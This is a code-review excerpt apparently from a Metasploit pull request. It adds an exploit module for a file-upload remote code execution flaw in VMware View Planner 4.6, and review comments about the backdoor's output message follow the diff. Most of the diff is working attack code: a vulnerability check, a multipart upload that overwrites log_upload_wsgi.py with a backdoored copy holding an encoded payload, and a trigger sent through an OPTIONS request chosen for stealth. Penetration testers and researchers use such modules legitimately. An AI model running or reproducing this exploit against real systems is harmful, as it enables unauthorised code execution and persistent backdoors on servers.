modules/exploits/linux/http/vmware_view_planner_4_6_uploadlog_rce.rb

```diff
@@ -0,0 +1,144 @@
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(443),
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'wsgi_log_upload', 'log_upload_wsgi.py')
+    )
+
+    unless res
+      return CheckCode::Unknown('Target did not respond to check.')
+    end
+
+    unless res&.code == 200 && res&.body
+      return CheckCode::Safe('log_upload_wsgi.py file not found at the expected location.')
+    end
+
+    @original_content = res.body # If the server responded with the contents of log_upload_wsgi.py, lets save this for later restoration.
+
+    if res.body&.include?('import hashlib') && res.body&.include?('if hashlib.sha256(password.value.encode("utf8")).hexdigest()==secret_key:')
+      return CheckCode::Safe("Target's log_upload_wsgi.py file has been patched.")
+    end
+
+    CheckCode::Appears('Vulnerable log_upload_wsgi.py file identified!')
+  end
+
+  # We need to upload a file twice: once for uploading the backdoor, and once for restoring the original file.
+  # As the code for both is the same, minus the content of the file, this is a generic function to handle that.
+  def upload_file(content)
+    mime = Rex::MIME::Message.new
+    mime.add_part(content, 'application/octet-stream', nil, 'form-data; name="logfile"; filename="log_upload_wsgi.py"')
+    mime.add_part('{"itrLogPath":"/etc/httpd/html/wsgi_log_upload","logFileType":"log_upload_wsgi.py"}', nil, nil, 'form-data; name="logMetaData"')
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'logupload'),
+      'ctype' => "multipart/form-data; boundary=#{mime.bound}",
+      'data' => mime.to_s
+    )
+    unless res.to_s.include?('File uploaded successfully.')
+      fail_with(Failure::UnexpectedReply, "Target indicated that the file wasn't uploaded sucessfully!")
+    end
+  end
+
+  def exploit
+    # Here we want to grab our template file, taken from a clean install but
+    # with a backdoor section added to it, and then fill in the PAYLOAD placeholder
+    # with the payload we want to execute.
+    data_dir = File.join(Msf::Config.data_directory, 'exploits', shortname)
+    f_handle = File.open(File.join(data_dir, 'log_upload_wsgi.py'), 'rb')
+    file_content = f_handle.read
+    f_handle.close
+
+    payload.encoded.gsub!(/"/, '\\"')
+    file_content['PAYLOAD'] = payload.encoded
+
+    # Now that things are primed, upload the file to the target.
+    print_status('Uploading backdoor to system via the arbitrary file upload vulnerability!')
+    upload_file(file_content)
+    print_good('Backdoor uploaded!')
+
+    # And then use the OPTIONS request to trigger the backdoor. Technically this
+    # could be any other method including invalid ones like BACKDOOR, but for
+    # the purposes of stealth lets use a legitimate one.
```

Comment:
But the backdoor yells `Payload success!` at me.

Reply:
Haha fair point I think this was originally done cause I thought I needed that as an indicator of success but seeing as the code has better ways of determining that and I don't check for that message its good to just remove this. My bad!

Reply:
Resolved with https://github.com/rapid7/metasploit-framework/pull/14875/commits/36f937601aca01c7522db78222633ebbe7d9c03c